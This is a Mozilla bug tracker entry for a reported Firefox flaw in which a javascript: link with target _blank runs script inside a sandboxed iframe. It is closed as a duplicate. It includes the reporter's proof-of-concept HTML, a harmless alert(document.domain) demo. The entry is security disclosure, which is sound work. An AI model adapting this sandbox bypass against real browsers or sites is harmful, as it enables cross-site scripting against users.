Closed
Bug 1744490
Opened 3 years ago
Closed 3 years ago
iframe sandbox bypass with javascript URL and target _blank
Categories
(Core :: DOM: Security, defect)
Core
DOM: Security
Tracking
()
RESOLVED
DUPLICATE
of bug 1744352
People
(Reporter: freddy, Unassigned)
Details
(Keywords: reporter-external, sec-moderate, wsec-xss, Whiteboard: [reporter-external] [client-bounty-form])
This was received via email to security@ from Ed McManus:
Hi I believe the following is an XSS vulnerability present in the current release channel. By specifying target="blank" you can execute javascript in the domain of a sandboxed iframe.
This behavior is blocked by Edge, Chrome, and Safari. Demo: https://emcmanus.github.io/xss.html
Expected result:
Sandboxed iframes should not execute JS unless `allow-scripts` is specified
Firefox should block the `javascript:` uri
Actual result:
Javascript runs in the current domain, even though `allow-scripts` is not specified
Edge, Safari and Chrome block this behavior
It does not matter whether you use src or srcdoc
I believe a related bug was patched in Firefox 79: https://www.mozilla.org/en-US/security/advisories/mfsa2020-30/#CVE-2020-15653
Here is the source of the demo:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv='content-type' content='text/html; charset=UTF-8'>
</head>
<body>
<iframe sandbox="allow-same-origin allow-popups" srcdoc="<a href="javascript:alert(document.domain)" target="_blank">click me</a>"></iframe>
</body>
</html>
Flags: sec-bounty?
Reporter | ||
Updated•3 years ago
|
Group: firefox-core-security → dom-core-security
Type: task → defect
Component: Security → DOM: Security
Keywords: sec-moderate,
wsec-xss
Product: Firefox → Core
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form]
Reporter | ||
Updated•3 years ago
|
Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → DUPLICATE
Reporter | ||
Updated•3 years ago
|
Flags: sec-bounty? → sec-bounty-
Updated•1 year ago
|
Group: dom-core-security
Updated•3 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•